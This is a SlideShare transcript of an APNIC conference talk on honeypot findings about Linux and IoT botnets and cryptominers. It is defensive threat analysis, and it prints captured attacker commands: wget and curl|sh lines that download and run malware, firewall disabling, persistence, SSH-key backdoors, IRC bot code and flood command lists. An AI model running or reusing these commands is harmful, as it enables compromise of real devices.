SlideShare a Scribd company logo

IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

APNIC
APNIC

The document discusses observations from the APNIC Community Honeynet Project, including Linux/Unix malware targeting servers and IoT devices, and lessons learned. Some key observations are the prevalence of Linux/Unix malware like Mirai that targets exposed devices with weak credentials. Honeypots captured login attempts and payloads downloaded from command and control servers. Lessons include the need to patch systems, use strong unique credentials, and monitor for infections.

Internet
1 of 38
Download to read offline
1 Observations and Lessons Learned from the APNIC Community Honeynet Project Adli Wahid Senior Internet Security Specialist, APNIC adli@apnic.net
2 2 Let’s Connect! LinkedIn: Adli Wahid Email: adli@apnic.net Twitter: @adliwahid PGP Key fingerprint = 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
3 3 Talk Overview 1. APNIC Community Honeynet Project 2. Observations on activities targeting Linux servers and IoTs 3. Lessons Learned / Reflections
4 4 Overview of the APNIC Community Honeynet Project
5 5 APNIC Community Honeynet Project • Context – Educational – using honeypots for understanding network security attacks / threats, part of our network security training – Situational awareness, the bigger picture, cooperation with other stakeholders, tools (i.e. MISP threat sharing platform, Wireshark, Suricata, etc ) • Collaboration – Partners deploy honeypots, APNIC runs the backend – Information collected among partners & threat sharing* • Outcomes – More than 50 distributed honeypots* in AP region since 2017 – Share threat information for APNIC members, partners (i.e CERTs/CSIRTs, Network Operators) • https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind- the-scenes/ • https://dash.apnic.net 5
6 6 APNIC Community Honeypot 1. Purpose and Placement o Research & Alerting – Internet 2. Type of Honeypots o Cowrie, Dionaea, RDPHoney, 3. Deployment – Community Honey Network (fork of Modern Honey Network) – Partners & Self Hosting 4. Data Collection & Analysis & Action – Logs, Visualization, Alert, Action (Incident Response) – Elasticsearch, Kibana, Logstash, Beats – Suricata IDS – ElastAlert + Slack 5. Maintenance – Ansible – LibreNMS Detection with Suricata Rulesets Slack Alert
7 7 Community Honeynet Infrastructure hpfeeds hpfeeds CHN MHN Filebeats (json) Filebeats (json) Logstash TLS TLS ElasticSear ch BigQuery Elastalert Kibana honeypots Distributed honeypots MHN – Modern Honey Network CHN – Community HoneyNetwork
8 8 * Traffic from the last 30 days
9 9
10 10
11 Country View – Pakistan (Last 90 days)
12 Observations and Lessons Learned
13 13 Linux/Unix Malware • Routers / IoT devices / Servers run Linux / Unix based OS • Not new but pervasive – Targets are exposed on the Internet (http, telnet, ssh) – Unpatched / Unmonitored (i.e. no Anti Virus, firmware upgrades not applied) – Default/Weak credentials • Popular example – Mirai (ddos agent) – Source code was shared publicly – Many variants – josho, owari, masuta, sora etc – Gafgyt • Simple technique of infecting and spreading & persistence • Interesting Scenarios – Working from Home – Servers / Hosting / Cloud
14 14 Different Perspectives of a DDoS My Network / Infrastructure / Host Source Target / Victim Perspective Attacker Perspective x
15 15 Service & Attacker Infrastructure • Setting up the infrastructure • Misconfigured services – Servers - NTP, DNS, SSDP, etc – Amplification attack – Spoof source of request – https://stats.cybergreen.net/ – https://www.shadowserver.org/what-we- do/network-reporting/get-reports • Active bot “recruitment” – Internet exposed services – Vulnerable devices – Weak credentials
18 18 source Brute force: Username: admin password:12345 Remote Code Execution via Web interface Download Binary / Execute Scan and gain access Connect to Command and Control C & C “Recruitment Process” wget http://37.x.2x.190:80/13747243572475/hx86_64 2 1 Attacker
19 19 Telnet/SSH Honeypot (Cowrie) • Emulates SSH / Telnet – Allows attacker to log in • Emulates Linux/Unix environment – Captures command issued by attacker after login – Including download • ”Look and Feel” of Linux/Unix server and IoT devices • Attract certain class of attacks – Scan for SSH/Telnet – Bruteforce username/password – Login & execute payload(s) • Ddos Agents & Cryptominers – Based on post-login activities and binary collected Mirai sample – 2016
20 Successful Logins – New Honeypot { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:50.568233Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "123.b.c.12", "session": "fd7977b0b54a", "password": "taZz@23495859", "sensor": "mn-001" } { "eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:59.378766Z", "message": "login attempt [root/taZz@23495859] succeeded", "src_ip": "80.x.y.62", "session": "fdcd399b1282", "password": "taZz@23495859", "sensor": "mn-001" } Check out: https://www.bankinfosecurity.com/botnets-keep-brute-forcing-internet-things-devices-a-
21 21 Execute Payload #!/bin/sh cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd / wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips
22 22 /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget - c http://116.211.145.29:8887/dx;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5 O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJ e0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPe cjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8h Gmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKg AySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ echo -e "passwordn1o53kTj3yZq9n1o53kTj3yZq9"|passwd|bash system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://spacewb.tech/poll/bd54f492-5909-49dd-bf2e-efbe029383ce mode=http dst- path=7wmp0b4s.rscrn/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,wri te
23 my $process = $rps[rand scalar @rps]; my @rversion = ("Phl4nk"); my $vers = $rversion[rand scalar @rversion]; my @rircname = ("zombie"); my $ircname = $rircname[rand scalar @rircname]; chop (my $realname = $rircname[rand scalar @rircname]); my $nick =$rircname[rand scalar @rircname]; my $server = '125.x.y.z53'; my $port = '1947'; my $linas_max='8'; my $sleep='5'; my $homedir = "/tmp"; my $version = 'v.02'; my @admins = ("Nite","NiteMax","Nite123"); #my @hostauth = ("Nite"); my @channels = ("#VPS"); Perl Script command: uname -a & curl -O http://[xx].do.am/adm.txt ; perl adm.txt ; rm -rf adm.txt
24 24 if ($funcarg =~ /^flood/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> "); sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= "); } if ($funcarg =~ /^utils/) { sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help: sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1================================================== }
25 * Non-spoof / non-root attacks: (can run on all bots) * * STD <ip> <port> <time> = A non spoof UDP HIV STD flooder * * HOLD <host> <port> <time> = A vanilla TCP connection flooder * * JUNK <host> <port> <time> = A vanilla TCP flooder (modded) * * UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non- spoof udp flooder * HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder * * * Spoof / root attacks: * * DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets. * * * Bot commands: * * AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically. * * GETIP <iface> = gets the IP address from an interface * * FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port) * RNDNICK = Randomizes knight nickname * * NICK <nick> = Changes the nick of the client * * SERVER <server> = Changes servers * * GETSPOOFS = Gets the current spoofing * * SPOOFS <subnet> = Changes spoofing to a subnet * * DISABLE = Disables all packeting from the knight * * ENABLE = Enables all packeting from the knight * * KILL = Kills the knight * * GET <http address> <save as> = Downloads a file off the web * * VERSION = Requests version of knight * * KILLALL = Kills all current packeting * * HELP = Displays this * * IRC <command> = Sends this command to the server * * SH <command> = Executes a command * * BASH <command> = Run a bash command * * ISH <command> = Interactive SH (via privmsg) * * SHD <command> = Daemonize command * * INSTALL <http://server/bin> = Install binary (via wget) * * BINUPDATE <http://server/bin> = Update a binary (via wget) * * LOCKUP <http://server/bin> = Kill telnet, install a backdoor! * * * Source code of IRC based bot
26 26 Linux/Mirai – Fbot https://blog.malwaremustdie.org/2020/02/mmd-0065-2021- linuxmirai-fbot-re.html 2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab- 7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech’] 2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518’]
27 27
28 Cryptominers / Cryptojacking
31 31 curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &
32 32 Snippet of shell script if [ ! -f "4d867bd38706a5f7" ]; then ARCH=$(getconf LONG_BIT) if [ ${ARCH}x = "64x" ]; then (curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7 ||wget -T180 -q img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -O 4d867bd38706a5f7 ||curl -fsSL -m180 never.b-cdn.net/x64 -o 4d867bd38706a5f7 ||wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7 ||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -o 4d867bd38706a5f7 ||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -O 4d867bd38706a5f7)
33 33 Find hash related to URL serving Malware a5fba021a41c520a81647cda41110033eba 4f8842eb3239f227bcbb0b1b110d6
34 34
35 35 Rocke Gang 1. https://isc.sans.edu/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/ 24916 (May 2019) 2. https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box- mining-challengers (May 2019) 3. https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes- tactics-now-more-difficult-to-detect (Oct 2019) 4. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to- evade-detection-by-cloud-security-products/ (Oct 2019)
36 36 www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaN R1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86Tfd Xi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )
37 37 Analysis - Interesting indicators • IP addresses of host for initial access, run script to download binary/malware – Normally compromised systems • IP addresses of host serving binary/malware + other artefacts • IP addresses/domains of command and control • Binaries, scripts, malware samples, source code (+ hashes) • Ssh keys, webshells, Group names, irc #channels • Miner related information • Correlate with other observations, reports, etc
38 38 Lessons Learned
39 39 Lessons Learned • Context how can we “ improve” security ? • Bad Practices o Telnet enabled by default on devices o Weak or default credentials not removed o Services not developed securely o Services not deployed securely (i.e. management interfaces shouldn’t be exposed on the Internet) o No action upon notification (not our device, it is the customers) • Miscreants will exploit the weaknesess & monetize
45 45 Source IP from TO 2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21 AbuseIPDB
46 46 Back to the drawing Board? • Keeping the Internet safe and secure for _everyone_ • Education – Users, operators, developers • Governance – Incident Response – Roles and responsibilities – Accountabilities
48 Thank You! LinkedIn: Adli Wahid Email: adli@apnic.net Twitter: @adliwahid PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696 https://www.unsplash.com/adliwahid

Recommended

"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsMen and Mice
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.SecuRing
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsOpenDNS
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsMen and Mice
 
How to send DNS over anything encrypted
How to send DNS over anything encryptedHow to send DNS over anything encrypted
How to send DNS over anything encryptedMen and Mice
 

Recommended

"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsMen and Mice
 
We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.We need t go deeper - Testing inception apps.
We need t go deeper - Testing inception apps.SecuRing
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]RootedCON
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsOpenDNS
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsMen and Mice
 
How to send DNS over anything encrypted
How to send DNS over anything encryptedHow to send DNS over anything encrypted
How to send DNS over anything encryptedMen and Mice
 
HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentNahidul Kibria
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
 
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-broDefcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-broPriyanka Aash
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationPrathan Phongthiproek
 
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...OW2
 
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...OpenDNS
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Francois Marier
 
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internetDefcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internetPriyanka Aash
 
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3Adel Karimi
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"DefCamp
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sightRob Gillen
 
Angler talk
Angler talkAngler talk
Angler talkArtsiom Holub
 
Kamailio and VoIP Wild World
Kamailio and VoIP Wild WorldKamailio and VoIP Wild World
Kamailio and VoIP Wild WorldDaniel-Constantin Mierla
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume CompromiseZach Grace
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wireInfoSec Addicts
 

More Related Content

What's hot

HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the BadXavier Mertens
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basicMksYi
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentNahidul Kibria
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
 
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-broDefcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-broPriyanka Aash
 
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...OW2
 
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...OpenDNS
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Francois Marier
 
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internetDefcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internetPriyanka Aash
 
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3Adel Karimi
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"DefCamp
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sightRob Gillen
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume CompromiseZach Grace
 

What's hot (20)

HTTP For the Good or the Bad
HTTP For the Good or the BadHTTP For the Good or the Bad
HTTP For the Good or the Bad
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
20190516 web security-basic
20190516 web security-basic20190516 web security-basic
20190516 web security-basic
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
 
HTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC EditionHTTP For the Good or the Bad - FSEC Edition
HTTP For the Good or the Bad - FSEC Edition
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training Program
 
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-broDefcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
Defcon 22-blake-self-cisc0ninja-dont-ddos-me-bro
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
Hammr Project Update: Machine Images and Docker Containers for your Cloud, OW...
 
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
Infrastructure Tracking with Passive Monitoring and Active Probing: ShmooCon ...
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
 
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internetDefcon 22-graham-mc millan-tentler-masscaning-the-internet
Defcon 22-graham-mc millan-tentler-masscaning-the-internet
 
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
 
Angler talk
Angler talkAngler talk
Angler talk
 
Kamailio and VoIP Wild World
Kamailio and VoIP Wild WorldKamailio and VoIP Wild World
Kamailio and VoIP Wild World
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
 

Similar to IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device InsecurityJeremy Brown
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wireInfoSec Addicts
 
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...APNIC
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsAPNIC
 
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
